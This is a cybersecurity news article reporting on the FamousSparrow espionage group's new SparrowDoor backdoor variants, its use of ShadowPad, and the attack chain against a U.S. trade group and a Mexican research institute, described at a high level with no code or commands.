SparrowDoor Backdoor Variants
The Chinese cyber espionage group known as FamousSparrow has been linked to fresh attacks on a U.S. trade group and a Mexican research institute, deploying its notorious SparrowDoor backdoor alongside the ShadowPad malware. The activity, observed in July 2024, marks the first time the group has leveraged ShadowPad, a tool frequently used by Chinese state-sponsored actors.
Table of Contents
The Evolution of SparrowDoor: A More Sophisticated Threat
FamousSparrow has introduced two new variants of its SparrowDoor backdoor, one of which is modular. These versions represent a significant leap in functionality, incorporating parallel execution of commands to enhance efficiency.
This marks a major upgrade from earlier versions. It allows the malware to execute commands such as file operations and interactive shell sessions without stalling ongoing tasks.
A History of Espionage: FamousSparrow’s Notable Attacks
Initially uncovered in September 2021, FamousSparrow has been linked to cyber attacks on hotels, governments, engineering firms and law offices. The group has previously operated independently, using SparrowDoor as its exclusive implant.
Over time, researchers have observed tactical similarities between FamousSparrow and other Chinese hacking groups like Earth Estries, GhostEmperor, and Salt Typhoon, the latter known for targeting the telecom sector. However, despite these overlaps, FamousSparrow remains classified as a distinct threat group with unique characteristics.
The Attack Chain: How the Breach Unfolded
The attack begins with FamousSparrow deploying a web shell on a vulnerable IIS server. While the exact method of gaining initial access remains unknown, both affected organizations were running outdated versions of Windows and Microsoft Exchange Server, making them prime targets.
Once the web shell is in place, it serves as a launchpad for a remote batch script. This script executes a Base64-encoded .NET web shell, ultimately deploying both SparrowDoor and ShadowPad onto the compromised system.
How SparrowDoor Works: A Deep Dive into Its Capabilities
One of the new SparrowDoor variants shares similarities with Crowdoor, a previously documented malware. However, both versions introduce substantial enhancements, including:
- Parallel task execution – The backdoor can run multiple commands at once, improving performance.
- Dynamic command handling – Commands trigger a new thread, which establishes a separate connection to the Command-and-Control (C&C) server.
- Victim tracking – Each connection includes a unique victim ID and command ID, helping the C&C server manage ongoing tasks efficiently.
SparrowDoor comes equipped with a range of capabilities that enhance its functionality. It can establish a proxy, allow for covert communication, and initiate interactive shell sessions to enable real-time command execution. The backdoor is also capable of handling various file operations, including reading, writing, and modifying files, while simultaneously enumerating the file system to map out available directories and data. Additionally, it gathers detailed host information, providing attackers with insights into the compromised system. If needed, SparrowDoor can even remove itself entirely, ensuring that traces of its presence are erased.
A Modular Approach: SparrowDoor’s Enhanced Version
The second, more advanced SparrowDoor variant introduces a modular, plugin-based design, expanding its capabilities through nine specialized modules:
- Cmd – Execute system commands
- CFile – Manage file operations
- CKeylogPlug – Log keystrokes
- CSocket – Establish a TCP proxy
- CShell – Initiate interactive shell sessions
- CTransf – Transfer files between the infected host and the C&C server
- CRdp – Capture screenshots
- CPro – List and terminate running processes
- CFileMoniter – Track file system changes in specific directories
FamousSparrow: Still Active, Still Evolving
This recent wave of activity confirms that FamousSparrow is not only still active but also investing in the continuous development of its SparrowDoor backdoor. With the introduction of modular capabilities and the adoption of ShadowPad, the group is clearly evolving, posing an even more significant cybersecurity threat moving forward.
